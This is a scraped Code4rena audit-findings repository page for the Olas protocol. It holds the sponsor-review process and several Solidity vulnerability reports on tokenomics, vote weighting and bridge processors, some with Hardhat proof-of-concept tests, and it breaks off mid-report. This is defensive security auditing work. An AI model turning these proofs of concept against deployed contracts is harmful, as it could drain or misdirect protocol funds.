
2024-05-olas-findings's Introduction

Olas Audit

Audit findings are submitted to this repo.

Unless otherwise discussed, this repo will be made public after audit completion, sponsor review, judging, and issue mitigation window.

Contributors to this repo: prior to report publication, please review the Agreements & Disclosures issue.

Note that when the repo is public, after all issues are mitigated, your comments will be publicly visible; they may also be included in your C4 audit report.


Review phase

Sponsors have three critical tasks in the audit process: reviewing the two lists of curated issues and, once you have mitigated your findings, sharing those mitigations.

  1. Respond to curated High- and Medium-risk submissions ↓
  2. Respond to curated Low-risk submissions ↓
  3. Share your mitigation of findings (optional) ↓

Note: be sure to review only issues from the curated lists. The two curated lists filter out unsatisfactory issues that don't require your attention.


      

Types of findings


High- or Medium-risk findings

Wardens submit issues without seeing each other's submissions, so keep in mind that there will always be findings that are duplicates. For all issues labeled 3 (High Risk) or 2 (Medium Risk), these have been pre-sorted for you so that there is only one primary issue open per unique finding. All duplicates have been labeled duplicate, linked to a primary issue, and closed.

QA reports and Gas reports

Any warden submissions in these two categories are submitted as bulk listings of issues and recommendations:

  • QA reports include all low severity findings and governance/centralization risk findings from an individual warden.
  • Gas reports (if applicable) include all gas optimization recommendations from an individual warden.

1. Respond to curated High- and Medium-risk submissions

This curated list will shorten as you work. View the original, longer list →

For each curated High- or Medium-risk finding, please:

1a. Label as one of the following:

  • sponsor confirmed, meaning: "Yes, this is a problem and we intend to fix it."
  • sponsor disputed, meaning either: "We cannot duplicate this issue" or "We disagree that this is an issue at all."
  • sponsor acknowledged, meaning: "Yes, technically the issue is correct, but we are not going to resolve it for xyz reasons."

Add any necessary comments explaining your rationale for your evaluation of the issue.

Note: Adding or changing labels other than those in this list will be automatically reverted by our bot, which will note the change in a comment on the issue.

1b. Weigh in on severity

If you believe a finding is technically correct but disagree with the listed severity, leave a comment indicating your reasoning for the judge to review. For a detailed breakdown of severity criteria and how to estimate risk, please refer to the judging criteria in our documentation.

Judges have the ultimate discretion in determining validity and severity of issues, as well as whether/how issues are considered duplicates. However, sponsor input is a significant criterion.


2. Respond to curated Low-risk submissions

This curated list will shorten as you work. View the original, longer list →

  • Leave a comment for the judge on any reports you consider to be particularly high quality.
  • Add the sponsor disputed label to any reports that you think should be completely disregarded by the judge, i.e. the report contains no valid findings at all.

Once Step 1 and 2 are complete

When you have finished labeling and responding to findings, drop the C4 team a note in your private Discord backroom channel and let us know you've completed the sponsor review process. At this point, we will pass the repo over to the judge to review your feedback while you work on mitigations.


3. Share your mitigation of findings (Optional)

Once you have confirmed the findings you intend to mitigate, you will want to address them before the audit report is made public. Linking your mitigation PRs to your audit findings enables us to include them in your C4 audit report.

Note: You can work on your mitigations during the judging phase -- or beyond it, if you need more time. We won't publish the final audit report until you give us the OK.

If you are planning a Code4rena mitigation review:

  1. In your own GitHub repo, create a branch based on the commit you used for your Code4rena audit, then
  2. Create a separate Pull Request for each High or Medium risk C4 audit finding that you confirmed (e.g. one PR for finding H-01, another for H-02, etc.)
  3. Link the PR to the issue that it resolves within your audit findings repo. (If the issue in question has duplicates, please link to your PR from the open/primary issue.)

Most C4 mitigation reviews focus exclusively on reviewing mitigations of High and Medium risk findings. Therefore, QA and Gas mitigations should be done in a separate branch. If you want your mitigation review to include QA or Gas-related PRs, please reach out to C4 staff and let’s chat!

If several findings are inextricably related (e.g. two potential exploits of the same underlying issue, etc.), you may create a single PR for the related findings.

If you aren’t planning a mitigation review

  1. Within a repo in your own GitHub organization, create a pull request for each finding.
  2. Link the PR to the issue that it resolves within your audit findings repo. (If the issue in question has duplicates, please link to your PR from the open/primary issue.)

This will allow for complete transparency in showing the work of mitigating the issues found in the audit.

2024-05-olas-findings's People

Contributors

howlbot-integration[bot], c4-bot-4, c4-bot-9, c4-bot-8, c4-judge, c4-bot-1, c4-bot-7, c4-bot-10, c4-bot-2, c4-bot-3, c4-bot-5, c4-bot-6, liveactionllama, jacobheun, code4rena-id[bot]

Stargazers

Mr Abdullah, sintayew gashaw, Martin Marchev

Watchers

Ashok

2024-05-olas-findings's Issues

Wrong maxBond/effectiveBond calculation in function Tokenomics.initializeTokenomics

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Tokenomics.sol#L509-L511
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Tokenomics.sol#L469-L473

Vulnerability details

Impact

  • Wrong maxBond/effectiveBond calculation
  • Allows more OLAS token to be used in bond program

Proof of Concept

Function Tokenomics.initializeTokenomics currently calculates initial maxBond/effectiveBond value for epoch 1 as follows:

uint256 _timeLaunch = IOLAS(_olas).timeLaunch();
if (block.timestamp >= (_timeLaunch + ONE_YEAR)) {
    revert Overflow(_timeLaunch + ONE_YEAR, block.timestamp);
}
uint256 zeroYearSecondsLeft = uint32(_timeLaunch + ONE_YEAR - block.timestamp);
uint256 _inflationPerSecond = getInflationForYear(0) / zeroYearSecondsLeft;
uint256 _maxBond = (_inflationPerSecond * _epochLen * _maxBondFraction) / 100;
maxBond = uint96(_maxBond);
effectiveBond = uint96(_maxBond);

In summary, here is the flow of calculation:

  • The function will revert if the current time - (OLAS time launch) >= one year
  • Then inflationPerSecond = (inflation for year 0 = 3_159_000e18) / (timeLaunch + one year - block.timestamp)
  • Then effectiveBond = (_inflationPerSecond * _epochLen * _maxBondFraction) / 100;

The problem is that if zeroYearSecondsLeft < epochLen, effectiveBond will end up larger than it should be and, in edge cases, will even break the all-time inflation caps.

For example:

  • Suppose initializeTokenomics is called (1 year - 5 minutes) after the OLAS launch time, with _epochLen = 30 days and _maxBondFraction = 50
  • Then zeroYearSecondsLeft = _timeLaunch + ONE_YEAR - block.timestamp = 5 minutes = 300
  • _inflationPerSecond = getInflationForYear(0) / zeroYearSecondsLeft = 3_159_000e18/300 = 1.053e22
  • effectiveBond = maxBond = (_inflationPerSecond * _epochLen * _maxBondFraction) / 100 = 1.053e22 * (30*24*3600) * 50/ 100 = 1.364688e+28
  • The value 1.364688e+28 is 4320 times the max inflation cap for year 0 and larger than all inflation caps for the 10 years combined, as defined in file TokenomicsConstants:
uint88[10] memory inflationAmounts = [
    3_159_000e18,
    40_254_084e18,
    40_400_000e18,
    56_000_000e18,
    80_000_000e18,
    72_000_000e18,
    64_000_000e18,
    48_000_000e18,
    40_000_000e18,
    29_686_916e18
];

Below is a POC for the above case, save this test case to file tokenomics/test/Tokenomics.js and run it using command:
npx hardhat test test/Tokenomics.js --grep effectiveBond:

it("Wrong maxBond/effectiveBond calculation at Tokenomics initialization", async function () {
            // Wait some time
            const timeLaunch = await olas.timeLaunch();
            console.log(`Time launch ${timeLaunch}`)
            await helpers.time.increase(oneYear - 5*60);


            const customTokenomicsMaster = await tokenomicsFactory.deploy();
            await customTokenomicsMaster.deployed();
            proxyData = customTokenomicsMaster.interface.encodeFunctionData("initializeTokenomics",
            [olas.address, treasury.address, deployer.address, deployer.address, ve.address, epochLen,
                componentRegistry.address, agentRegistry.address, serviceRegistry.address, donatorBlacklist.address]);

            // Deploy tokenomics proxy based on the needed tokenomics initialization
            const CustomTokenomicsProxy = await ethers.getContractFactory("TokenomicsProxy");
            const customTokenomicsProxy = await CustomTokenomicsProxy.deploy(customTokenomicsMaster.address, proxyData);
            await customTokenomicsProxy.deployed();

            let customTokenomics = await ethers.getContractAt("Tokenomics", customTokenomicsProxy.address);

            const effectiveBond = await customTokenomics.effectiveBond();
            const year0Inflation = await customTokenomics.getInflationForYear(0);
            console.log(`Effective bond ${effectiveBond}, Year 0 inflation : ${year0Inflation}`);
            console.log(`Effective bond is ${effectiveBond/year0Inflation} times max inflation for year 0`);


        });

Tools Used

Manual review

Recommended Mitigation Steps

The problem arises because function initializeTokenomics assumes that zeroYearSecondsLeft is always larger than epochLen. To fix it, the code needs to check whether zeroYearSecondsLeft < epochLen; in that case, effectiveBond = maxBond = (year 0 inflation) * _maxBondFraction / 100, as sketched below.
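
A minimal sketch of that check, reusing the variables from the snippet above (the exact placement inside initializeTokenomics is an assumption):

uint256 _maxBond;
if (zeroYearSecondsLeft < _epochLen) {
    // Less than one epoch left in year 0: cap the bond at the year 0 inflation share
    _maxBond = (getInflationForYear(0) * _maxBondFraction) / 100;
} else {
    uint256 _inflationPerSecond = getInflationForYear(0) / zeroYearSecondsLeft;
    _maxBond = (_inflationPerSecond * _epochLen * _maxBondFraction) / 100;
}
maxBond = uint96(_maxBond);
effectiveBond = uint96(_maxBond);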

Assessed type

Math

if `removeNominee` is called then `_getSum` will skip a week in its update

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/governance/contracts/VoteWeighting.sol#L223-L249
https://github.com/code-423n4/2024-05-olas/blob/main/governance/contracts/VoteWeighting.sol#L586-L636

Vulnerability details

Issue Description

The removeNominee function is used to remove a nominee from the voting system. When the function is called, it invokes both _getWeight on the removed nominee and _getSum to update all other nominees.

The function also updates pointsSum.bias for the next timestamp nextTime in order to remove the weight associated with the nominee being removed, and it sets the global timestamp timeSum to nextTime, as shown below:

function removeNominee(bytes32 account, uint256 chainId) external {
    // Check for the contract ownership
    if (msg.sender != owner) {
        revert OwnerOnly(owner, msg.sender);
    }

    // Get the nominee struct and hash
    Nominee memory nominee = Nominee(account, chainId);
    bytes32 nomineeHash = keccak256(abi.encode(nominee));

    // Get the nominee id in the nominee set
    uint256 id = mapNomineeIds[nomineeHash];
    if (id == 0) {
        revert NomineeDoesNotExist(account, chainId);
    }

    // Set nominee weight to zero
    uint256 oldWeight = _getWeight(account, chainId);
    uint256 oldSum = _getSum();
    uint256 nextTime = (block.timestamp + WEEK) / WEEK * WEEK;
    pointsWeight[nomineeHash][nextTime].bias = 0;
    timeWeight[nomineeHash] = nextTime;

    // Account for the the sum weight change
    uint256 newSum = oldSum - oldWeight;
    pointsSum[nextTime].bias = newSum;
    timeSum = nextTime;

    ...
}

Setting timeSum equal to nextTime provokes an issue: nextTime is next week's timestamp, which was not yet included in the _getSum update when it was called. Because timeSum now equals nextTime, the next _getSum call will skip that week in its calculation, since it starts immediately from the week after it (due to t += WEEK):

function _getSum() internal returns (uint256) {
    // t is always > 0 as it is set in the constructor
    uint256 t = timeSum;
    Point memory pt = pointsSum[t];
    for (uint256 i = 0; i < MAX_NUM_WEEKS; i++) {
        if (t > block.timestamp) {
            break;
        }
        t += WEEK;
        uint256 dBias = pt.slope * WEEK;
        if (pt.bias > dBias) {
            pt.bias -= dBias;
            uint256 dSlope = changesSum[t];
            pt.slope -= dSlope;
        } else {
            pt.bias = 0;
            pt.slope = 0;
        }

        pointsSum[t] = pt;
        if (t > block.timestamp) {
            timeSum = t;
        }
    }
    return pt.bias;
}

This means that the week represented by nextTime in the removeNominee call will never have its changesSum changes recorded, because _getSum skips that week. The vote-weight accounting is thereby compromised, which impacts the whole staking system.

Here is an example showcasing how a timestamp representing a week will be skipped due to the issue in the removeNominee function:

Example Scenario

Assume the current timestamp is block.timestamp = 1650000000 (April 15, 2022, 05:20:00 UTC), and WEEK is defined as 604800 seconds (1 week).

Initial State:

  • timeSum = 1649289600 (April 7, 2022, 00:00:00 UTC)
  • pointsSum = {1649289600: Point { bias: 100, slope: 2 }}
  • changesSum = {}

A nominee is being removed with removeNominee function. The next week's timestamp (nextTime) will be calculated as follows:

  • nextTime = (1650000000 + 604800) / 604800 * 604800 = 1650499200 (April 21, 2022, 00:00:00 UTC)

Steps in removeNominee:

  1. Assume _getWeight(account, chainId) returns 20.
  2. oldWeight = 20
  3. _getSum() is called and returns the current sum (100).
  4. nextTime = 1650499200
  5. pointsWeight[nomineeHash][nextTime].bias = 0 (weight set to zero for removed nominee for next week)
  6. timeWeight[nomineeHash] = nextTime (time of weight update for nominee is set to next week)
  7. Calculate new sum: newSum = oldSum - oldWeight = 100 - 20 = 80
  8. Update sum for next week: pointsSum[nextTime].bias = 80
  9. timeSum is set to nextTime: timeSum = 1650499200

State After removeNominee Execution:

  • timeSum = 1650499200 (April 21, 2022, 00:00:00 UTC)
  • pointsSum = {1649289600: Point { bias: 100, slope: 2 }, 1650499200: Point { bias: 80, slope: 2 }}

Now, when _getSum is called again, it starts from timeSum and immediately computes t += WEEK, so the first week it processes is the one starting April 28, 2022. The week of April 21, 2022 is skipped, meaning any changesSum modifications recorded for that week are never applied, compromising the voting-weight logic and potentially affecting the entire staking system.

Impact

The voting weight logic will be compromised after a nominee gets removed.

Tools Used

Manual review, VS Code

Recommended Mitigation

The simplest way to address this issue is to not update the timeSum state directly in removeNominee and instead let it be updated when _getSum is called, as sketched below.
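
A minimal sketch of that change, shown as a diff against the removeNominee snippet above (whether any further adjustments are needed elsewhere is left to the team to verify):

     uint256 newSum = oldSum - oldWeight;
     pointsSum[nextTime].bias = newSum;
-    timeSum = nextTime;
+    // Do not advance timeSum here; _getSum will move it forward week by week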

Assessed type

Error

Contract Tokenomics does not track incentives by owner address

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Tokenomics.sol#L1348-L1350
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Tokenomics.sol#L592-L611

Vulnerability details

Impact

  • Owners could lose their incentives if registries are updated or if they transfer their component/agent NFTs.

Proof of Concept

Contract Tokenomics currently tracks incentives using unitId (the id of a component/agent); the incentive information is stored in the mapUnitIncentives variable:

// Mapping of component / agent Id => incentive balances
    mapping(uint256 => mapping(uint256 => IncentiveBalances)) public mapUnitIncentives;
// Struct for component / agent incentive balances
struct IncentiveBalances {
    // Reward in ETH
    // Even if the ETH inflation rate is 5% per year, it would take 130+ years to reach 2^96 - 1 of ETH total supply
    uint96 reward;
    // Pending relative reward in ETH
    uint96 pendingRelativeReward;
    // Top-up in OLAS
    // After 10 years, the OLAS inflation rate is 2% per year. It would take 220+ years to reach 2^96 - 1
    uint96 topUp;
    // Pending relative top-up
    uint96 pendingRelativeTopUp;
    // Last epoch number the information was updated
    // This number cannot be practically bigger than the number of blocks
    uint32 lastEpoch;
}

When a user claims their incentives via accountOwnerIncentives function, the function will revert if the input account is not the owner of the agent/component:

function accountOwnerIncentives(
        address account,
        uint256[] memory unitTypes,
        uint256[] memory unitIds
    )
{
...
// Check the component / agent Id ownership
            address unitOwner = IToken(registries[unitTypes[i]]).ownerOf(unitIds[i]);
            if (unitOwner != account) {
                revert OwnerOnly(unitOwner, account);
            }
...
}

However, components/agents can be transferred as normal NFTs because the AgentRegistry and ComponentRegistry contracts both inherit ERC721 and do not forbid token transfers.
Therefore, if owners transfer their NFTs to others, they lose their incentives. The Olas docs state that "The primary goal is to create a sustainable ecosystem to incentivize developers to contribute to the network and reward them for their participation proportionally to their efforts, while the platform itself grows and becomes more valuable." An owner should expect to be able to claim the incentives donated to their components/agents before transferring those components/agents to others (because it is their effort/contribution up to that time).

Moreover, registries can be changed by Tokenomics owner via function changeRegistries:

function changeRegistries(address _componentRegistry, address _agentRegistry, address _serviceRegistry) external {
        // Check for the contract ownership
        if (msg.sender != owner) {
            revert OwnerOnly(msg.sender, owner);
        }

        // Check for registries addresses
        if (_componentRegistry != address(0)) {
            componentRegistry = _componentRegistry;
            emit ComponentRegistryUpdated(_componentRegistry);
        }
        if (_agentRegistry != address(0)) {
            agentRegistry = _agentRegistry;
            emit AgentRegistryUpdated(_agentRegistry);
        }
        if (_serviceRegistry != address(0)) {
            serviceRegistry = _serviceRegistry;
            emit ServiceRegistryUpdated(_serviceRegistry);
        }
    }

If registries are changed, owners of old components/agents will also lose all their incentives.

Below is a POC for the above issue, save this test case to file tokenomics/test/DispenserDevIncentives.js and run it using command:
npx hardhat test test/DispenserDevIncentives.js --grep IncentivesLost

it("IncentivesLost", async () =>  {
            // Take a snapshot of the current state of the blockchain
            const snapshot = await helpers.takeSnapshot();

            // Skip the number of seconds for 2 epochs
            await helpers.time.increase(epochLen + 10);
            await tokenomics.connect(deployer).checkpoint();
            await helpers.time.increase(epochLen + 10);
            await tokenomics.connect(deployer).checkpoint();

            // Send ETH to treasury
            const amount = ethers.utils.parseEther("1000");
            await deployer.sendTransaction({to: treasury.address, value: amount});

            // Lock OLAS balances with Voting Escrow
            const minWeightedBalance = await tokenomics.veOLASThreshold();
            await ve.setWeightedBalance(minWeightedBalance.toString());
            await ve.createLock(deployer.address);

            // Change the first service owner to the deployer (same for components and agents)
            await serviceRegistry.changeUnitOwner(1, deployer.address);
            await componentRegistry.changeUnitOwner(1, deployer.address);
            await agentRegistry.changeUnitOwner(1, deployer.address);

            // Send donations to services
            await treasury.connect(deployer).depositServiceDonationsETH([1, 2], [regDepositFromServices, regDepositFromServices],
                {value: twoRegDepositFromServices});
            // Move more than one epoch in time
            await helpers.time.increase(epochLen + 10);
            await tokenomics.connect(deployer).checkpoint();


            // Check for the incentive balances of component and agent such that their pending relative incentives are non-zero
            let incentiveBalances = await tokenomics.mapUnitIncentives(0, 1);
            expect(Number(incentiveBalances.pendingRelativeReward)).to.greaterThan(0);
            expect(Number(incentiveBalances.pendingRelativeTopUp)).to.greaterThan(0);
            incentiveBalances = await tokenomics.mapUnitIncentives(1, 1);
            expect(incentiveBalances.pendingRelativeReward).to.greaterThan(0);
            expect(incentiveBalances.pendingRelativeTopUp).to.greaterThan(0);


            // Transfer the component to another owner
            await componentRegistry.changeUnitOwner(1, signers[3].address);
            await expect(
                dispenser.connect(deployer).callStatic.claimOwnerIncentives([0, 1], [1, 1])
            ).to.be.revertedWithCustomError(tokenomics, "OwnerOnly");
        });

Tools Used

Manual Review

Recommended Mitigation Steps

Contract Tokenomics should track incentives by owner (regardless of old or new registries) instead of by unit Ids, as sketched below.
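
One possible shape for owner-based tracking, as an illustration only (mapOwnerIncentives and the crediting point are assumptions, not existing code):

// Unit type => unit Id => owner at accrual time => incentive balances (hypothetical)
mapping(uint256 => mapping(uint256 => mapping(address => IncentiveBalances))) public mapOwnerIncentives;

// When incentives are finalized for a unit, credit the unit's current owner
address unitOwner = IToken(registries[unitType]).ownerOf(unitId);
mapOwnerIncentives[unitType][unitId][unitOwner].reward += uint96(totalIncentives);

// When claiming, read the caller's own accrued balance instead of checking current NFT ownership
IncentiveBalances storage balances = mapOwnerIncentives[unitTypes[i]][unitIds[i]][account];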

Assessed type

Governance

Tokens bridged to Polygon can get stuck

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/PolygonDepositProcessorL1.sol#L25-L26
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/PolygonDepositProcessorL1.sol#L64-L72

Vulnerability details

Relevant code: PolygonDepositProcessorL1::predicate, PolygonDepositProcessorL1::_sendMessage

Description

When bridging token incentives with PolygonDepositProcessorL1, the tokens need to be sent to a predicate contract, which is used to lock the tokens on L1:

// ERC20 Predicate contract address
address public immutable predicate;

function _sendMessage(...) {
	if (transferAmount > 0) {
	    IToken(olas).approve(predicate, transferAmount);
	    IBridge(l1TokenRelayer).depositFor(l2TargetDispenser, olas, abi.encode(transferAmount));
	}
}

The predicate contract is set as immutable, which is an issue as the Polygon PoS bridge allows for changing it or having multiple of them:

bytes32 tokenType = tokenToType[rootToken];
require(
    rootToChildToken[rootToken] != address(0x0) &&
       tokenType != 0,
    "RootChainManager: TOKEN_NOT_MAPPED"
);
address predicateAddress = typeToPredicate[tokenType];
require(
    predicateAddress != address(0),
    "RootChainManager: INVALID_TOKEN_TYPE"
);

This means that if the predicate is changed in the Polygon bridge, the PolygonDepositProcessorL1 will continue locking tokens on the old L1 predicate and this will prevent tokens arriving at the destination Service contract.

Root Cause

Hardcoded value: address public immutable predicate;

Impact

Changing the predicate contract in the Polygon bridge will cause PolygonDepositProcessorL1 to incorrectly lock funds on L1 without bridging them to L2. Funds are not lost forever, but recovery becomes complicated: PolygonDepositProcessorL1 will always point to the same predicate, so the processor would have to be replaced, and additional steps would then be needed to retrieve the funds from the old predicate. All of this will significantly delay token rewards on Polygon and increase operational overhead.

Suggested Mitigation

Fortunately, this issue is easy to mitigate by querying the correct predicate contract from the bridge.

First modify the IBridge interface to include the following functions:

interface IBridge {
	...
	function tokenToType(address) external returns(bytes32);
	function typeToPredicate(bytes32) external returns(address);
}

Next, modify the PolygonDepositProcessorL1::_sendMessage function:

if (transferAmount > 0) {
    bytes32 tokenType = IBridge(l1TokenRelayer).tokenToType(olas);
    address predicate = IBridge(l1TokenRelayer).typeToPredicate(tokenType);
    IToken(olas).approve(predicate, transferAmount);
    IBridge(l1TokenRelayer).depositFor(l2TargetDispenser, olas, abi.encode(transferAmount));
}

Finally, remove the predicate state variable:

- address public immutable predicate;

Assessed type

Other

Agreements & Disclosures

Agreements

If you are a C4 Certified Contributor, by commenting or interacting with this repo prior to public release of the contest report, you agree that you have read the Certified Warden docs and agree to be bound by:

To signal your agreement to these terms, add a 👍 emoji to this issue.

Code4rena staff reserves the right to disqualify anyone from this role and similar future opportunities who is unable to participate within the above guidelines.

Disclosures

Sponsors may elect to add team members and contractors to assist in sponsor review and triage. All sponsor representatives added to the repo should comment on this issue to identify themselves.

To ensure contest integrity, the following potential conflicts of interest should also be disclosed with a comment in this issue:

  1. any sponsor staff or sponsor contractors who are also participating as wardens
  2. any wardens hired to assist with sponsor review (and thus presenting sponsor viewpoint on findings)
  3. any wardens who have a relationship with a judge that would typically fall in the category of potential conflict of interest (family, employer, business partner, etc)
  4. any other case where someone might reasonably infer a possible conflict of interest.

EVM chain id used instead of Wormhole chain id for `refundChain` in `WormholeDepositProcessorL1`

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/WormholeDepositProcessorL1.sol#L96-L97

Vulnerability details

Vulnerability Details

The EVM chain id (which is l2TargetChainId) is used for the refundChain parameter instead of the Wormhole chain id (which is wormholeTargetChainId).

WormholeDepositProcessorL1.sol#L96-L97

        sequence = sendTokenWithPayloadToEvm(uint16(wormholeTargetChainId), l2TargetDispenser, data, 0,
            gasLimitMessage, olas, transferAmount, uint16(l2TargetChainId), refundAccount);

For this particular function, the refundChain must be specified as a Wormhole chain id instead of an EVM chain id. Please note that the Wormhole chain id is not the same as the EVM chain id (see the Wormhole documentation for more information).

The Wormhole chain id must be used because sendTokenWithPayloadToEvm uses sendVaasToEvm, which also expects refundChain to be in the Wormhole chain id format.

TokenBase.sol#L125-L155

    function sendTokenWithPayloadToEvm(
        uint16 targetChain,
        address targetAddress,
        bytes memory payload,
        uint256 receiverValue,
        uint256 gasLimit,
        address token,
        uint256 amount,
        uint16 refundChain,
        address refundAddress
    ) internal returns (uint64) {
        VaaKey[] memory vaaKeys = new VaaKey[](1);
        vaaKeys[0] = transferTokens(token, amount, targetChain, targetAddress);

        (uint256 cost, ) = wormholeRelayer.quoteEVMDeliveryPrice(
            targetChain,
            receiverValue,
            gasLimit
        );
        return
            wormholeRelayer.sendVaasToEvm{value: cost}(
                targetChain,
                targetAddress,
                payload,
                receiverValue,
                gasLimit,
                vaaKeys,
                refundChain,
                refundAddress
            );
    }

IWormholeRelayer.sol#L161-L191

    /**
     * @notice Publishes an instruction for the default delivery provider
     * to relay a payload and VAAs specified by `vaaKeys` to the address `targetAddress` on chain `targetChain`
     * with gas limit `gasLimit` and `msg.value` equal to `receiverValue`
     *
     * Any refunds (from leftover gas) will be sent to `refundAddress` on chain `refundChain`
     * `targetAddress` must implement the IWormholeReceiver interface
     *
     * This function must be called with `msg.value` equal to `quoteEVMDeliveryPrice(targetChain, receiverValue, gasLimit)`
     *
     * @param targetChain in Wormhole Chain ID format
     * @param targetAddress address to call on targetChain (that implements IWormholeReceiver)
     * @param payload arbitrary bytes to pass in as parameter in call to `targetAddress`
     * @param receiverValue msg.value that delivery provider should pass in for call to `targetAddress` (in targetChain currency units)
     * @param gasLimit gas limit with which to call `targetAddress`. Any units of gas unused will be refunded according to the
     *        `targetChainRefundPerGasUnused` rate quoted by the delivery provider
     * @param vaaKeys Additional VAAs to pass in as parameter in call to `targetAddress`
     * @param refundChain The chain to deliver any refund to, in Wormhole Chain ID format
     * @param refundAddress The address on `refundChain` to deliver any refund to
     * @return sequence sequence number of published VAA containing delivery instructions
     */
    function sendVaasToEvm(
        uint16 targetChain,
        address targetAddress,
        bytes memory payload,
        uint256 receiverValue,
        uint256 gasLimit,
        VaaKey[] memory vaaKeys,
        uint16 refundChain,
        address refundAddress
    ) external payable returns (uint64 sequence);

Impact

Refunds sent to incorrect chain and possibly wrong address.

Tools Used

Manual

Recommended Mitigation Steps

-        sequence = sendTokenWithPayloadToEvm(uint16(wormholeTargetChainId), l2TargetDispenser, data, 0,
            gasLimitMessage, olas, transferAmount, uint16(l2TargetChainId), refundAccount);
+        sequence = sendTokenWithPayloadToEvm(uint16(wormholeTargetChainId), l2TargetDispenser, data, 0,
            gasLimitMessage, olas, transferAmount, uint16(wormholeTargetChainId), refundAccount);

Assessed type

Other

`withheldToken` logic: total claimed amount can be greater than the emissionsAmount for a target

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L160-L210

Vulnerability details

Impact

The total incentives claimed by a target can exceed the emissionsAmount for that target.

Proof of Concept

DefaultTargetDispenserL2#_processData: if claimedAmount > emissionsAmount, the difference claimedAmount - emissionsAmount should be withheld. However, this logic is not fully effective, because the total claimed amount can exceed emissionsAmount even when each individual claimedAmount is below emissionsAmount.
For example,

  • say emissionsAmount for a target is 1000 olas
  • if claimStakingIncentive gets called for that target, and the claimed olas=1100, protocol "withholds" 100 olas
  • but if claimStakingIncentive gets called two times at times t1, t2 such that claimedOLAS at t1=550, claimedOLAS at t2=550, no tokens will be withheld even though the totalClaimedOLAS=1100, which is greater than the emissionsAmount.

This is because DefaultTargetDispenserL2#_processData only checks the amount currently being claimed against the emissionsAmount for the target:

function _processData(bytes memory data) internal {
    ...
    for (uint256 i = 0; i < targets.length; ++i) {
        ...
        bytes memory verifyData = abi.encodeCall(IStakingFactory.verifyInstanceAndGetEmissionsAmount, target);
        (bool success, bytes memory returnData) = stakingFactory.call(verifyData);

        uint256 limitAmount;

        if (success && returnData.length == 32) {
            limitAmount = abi.decode(returnData, (uint256));
        }

        if (limitAmount == 0) {
            // Withhold OLAS for further usage
            localWithheldAmount += amount;
            emit AmountWithheld(target, amount);

            // Proceed to the next target
            continue;
        }

        // Check the amount limit and adjust, if necessary
        if (amount > limitAmount) {
            uint256 targetWithheldAmount = amount - limitAmount;
            localWithheldAmount += targetWithheldAmount;
            amount = limitAmount;

            emit AmountWithheld(target, targetWithheldAmount);
        }
        ...
    }
    ...
    if (localWithheldAmount > 0) {
        withheldAmount += localWithheldAmount;
    }
    ...
}

Tools Used

Manual Review

Recommended Mitigation Steps

A totalClaimedAmount value should be tracked per target and updated each time a reward is claimed. If totalClaimedAmount > emissionsAmount, the withheld tokens should be set to totalClaimedAmount - emissionsAmount, as sketched below.
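
A sketch of that cumulative check inside _processData, assuming a new totalClaimedAmount mapping (all names here are illustrative, not existing code):

// Cumulative OLAS sent to each target (hypothetical new state variable)
mapping(address => uint256) public totalClaimedAmount;

// Inside the loop over targets, after limitAmount has been obtained:
uint256 alreadyClaimed = totalClaimedAmount[target];
if (alreadyClaimed + amount > limitAmount) {
    // Only the portion that keeps the cumulative total within the emissions limit is paid out
    uint256 allowed = limitAmount > alreadyClaimed ? limitAmount - alreadyClaimed : 0;
    uint256 targetWithheldAmount = amount - allowed;
    localWithheldAmount += targetWithheldAmount;
    amount = allowed;
    emit AmountWithheld(target, targetWithheldAmount);
}
totalClaimedAmount[target] = alreadyClaimed + amount;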

Assessed type

Error

Cross-chain gas fees are double paid for Optimism bridging.

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/OptimismDepositProcessorL1.sol#L95-L144
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/OptimismTargetDispenserL2.sol#L55-L92

Vulnerability details

Vulnerability Details

There is currently a misunderstanding of how the cross-chain gas is paid for in the Optimism bridge.

In particular, from the code below, it seems that you need to pay for the cross-chain gas by sending ETH to the Optimism CrossDomainMessenger. This can be seen in how a cost amount of ETH is passed to the CrossDomainMessenger contract.

OptimismDepositProcessorL1.sol#L95-L144

    function _sendMessage(
        address[] memory targets,
        uint256[] memory stakingIncentives,
        bytes memory bridgePayload,
        uint256 transferAmount
    ) internal override returns (uint256 sequence) {
        // Check for the bridge payload length
        if (bridgePayload.length != BRIDGE_PAYLOAD_LENGTH) {
            revert IncorrectDataLength(BRIDGE_PAYLOAD_LENGTH, bridgePayload.length);
        }

        // Check for the transferAmount > 0
        if (transferAmount > 0) {
            // Deposit OLAS
            // Approve tokens for the predicate bridge contract
            // Source: https://github.com/maticnetwork/pos-portal/blob/5fbd35ba9cdc8a07bf32d81d6d1f4ce745feabd6/flat/RootChainManager.sol#L2218
            IToken(olas).approve(l1TokenRelayer, transferAmount);

            // Transfer OLAS to L2 staking dispenser contract across the bridge
            IBridge(l1TokenRelayer).depositERC20To(olas, olasL2, l2TargetDispenser, transferAmount,
                uint32(TOKEN_GAS_LIMIT), "");
        }

        // Decode cost related data
        (uint256 cost, uint256 gasLimitMessage) = abi.decode(bridgePayload, (uint256, uint256));
        // Check for zero values
        if (cost == 0 || gasLimitMessage == 0) {
            revert ZeroValue();
        }

        // Check for the max message gas limit
        if (gasLimitMessage > MESSAGE_GAS_LIMIT) {
            revert Overflow(gasLimitMessage, MESSAGE_GAS_LIMIT);
        }

        // Check that provided msg.value is enough to cover the cost
        if (cost > msg.value) {
            revert LowerThan(msg.value, cost);
        }

        // Assemble data payload
        bytes memory data = abi.encodeWithSelector(RECEIVE_MESSAGE, abi.encode(targets, stakingIncentives));

        // Send message to L2
        // Reference: https://docs.optimism.io/builders/app-developers/bridging/messaging#for-l1-to-l2-transactions-1
        IBridge(l1MessageRelayer).sendMessage{value: cost}(l2TargetDispenser, data, uint32(gasLimitMessage));
